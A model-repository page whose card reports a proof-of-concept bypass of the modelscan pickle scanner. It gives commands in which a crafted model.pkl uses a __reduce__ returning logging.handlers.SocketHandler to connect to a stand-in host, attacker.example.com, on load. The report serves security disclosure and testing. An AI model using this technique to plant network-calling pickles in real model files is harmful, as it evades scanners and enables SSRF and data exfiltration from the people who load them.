You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Modelscan Bypass: logging.handlers.SocketHandler SSRF

Summary

logging.handlers.SocketHandler is NOT in modelscan's blocklist. On unpickle, it immediately attempts a TCP connection to the specified host:port.

Impact: HIGH (SSRF/Data Exfiltration)

Attacker can exfiltrate data from internal networks by pointing the handler at internal services.

Reproduction

modelscan scan -p model.pkl
# Output: "No issues found"

# Start a listener:  nc -l 9999
python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
# TCP connection made to attacker.example.com:9999

PoC Details

  • File: model.pkl (68 bytes)
  • Technique: __reduce__ returns (logging.handlers.SocketHandler, ('host', port))
  • modelscan version: 0.7.6
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support